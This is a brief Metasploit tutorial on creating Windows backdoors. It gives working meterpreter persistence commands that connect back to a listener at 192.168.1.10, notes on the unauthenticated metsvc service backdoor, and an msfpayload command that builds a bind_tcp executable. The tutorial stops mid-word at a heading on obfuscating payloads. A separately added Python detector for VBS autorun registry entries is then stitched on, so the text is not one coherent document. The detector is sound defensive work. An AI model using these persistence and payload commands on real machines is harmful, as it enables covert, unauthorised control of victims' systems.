Metasploit Backdoor Tutorial
Backdoor: Create persistence backdoor

- Can be configured to connect back on system boot or user login
- Time can be set between connect-back attempts

Under the hood

- Creates a VBS file on the victim and executes it
- Adds registry entries so it runs automatically
- Can be uninstalled remotely
- The VBS file must be deleted manually

    meterpreter > run persistence
    meterpreter > run persistence -A -U -i 10 -p 3000 -r 192.168.1.10

Metsvc backdoor

- Runs as a service on the victim
- Connect to it remotely
- No authentication required
- Can be remotely uninstalled
- File needs to be deleted manually
- Less noisy compared to persistence
- Attacker can connect when he wants
- Can be found by port scanning

Demo: Backdoor with Metsvc

Create Executable from payloads

Msfpayload

Use: msfpayload [var=val] [S]ummary|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[D]ll|[V]BA|[W]ar

Ex: msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.100 X > bind_tcp.exe

Encoding to obfuscate payload

Encode payload to e
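
Detection example for the persistence backdoor described above (added here, not part of the original tutorial): the "Under the hood" notes say a VBS file is dropped and registry autorun entries are added, so a defender can review autorun values for commands that start a script. The sample `reg query` output, value names and paths are constructed, and checking the standard Run keys is an assumption, since the page does not name the registry location.

```python
import re

# Constructed sample: `reg query` style output of the Run keys on a test host.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VendorUpdater    REG_SZ    "C:\Program Files\Vendor\updater.exe" /silent

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    qWzKpLmT    REG_SZ    C:\Users\alice\AppData\Local\Temp\xYzAbC.vbs
    Helper    REG_SZ    wscript.exe //B "C:\ProgramData\helper.js"
"""

VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")
# Heuristics (assumptions of this example), each paired with the reason it reports.
CHECKS = [
    ("script file", re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)),
    ("script host", re.compile(r"\b(wscript|cscript)(\.exe)?\b", re.I)),
    ("user-writable path", re.compile(r"\\(temp|appdata|programdata|users\\public)\\", re.I)),
]

def parse_run_keys(text):
    """Yield (key, value_name, data) tuples from `reg query` style output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
        else:
            m = VALUE_LINE.match(line)
            if m and key:
                yield key, m.group("name"), m.group("data").strip()

def score_entry(data):
    """Return the reasons an autorun command looks like script-based persistence."""
    return [label for label, rx in CHECKS if rx.search(data)]

def find_suspicious_autoruns(text):
    """Flag entries that launch a script; a writable path alone is too noisy."""
    hits = []
    for key, name, data in parse_run_keys(text):
        reasons = score_entry(data)
        if "script file" in reasons or "script host" in reasons:
            hits.append((key, name, data, reasons))
    return hits

if __name__ == "__main__":
    for key, name, data, reasons in find_suspicious_autoruns(SAMPLE_REG_QUERY):
        print(f"{key}\\{name}: {data}  [{', '.join(reasons)}]")
```

The OneDrive entry sits under AppData but is not flagged, which is why a user-writable path is reported only as supporting context for a script hit.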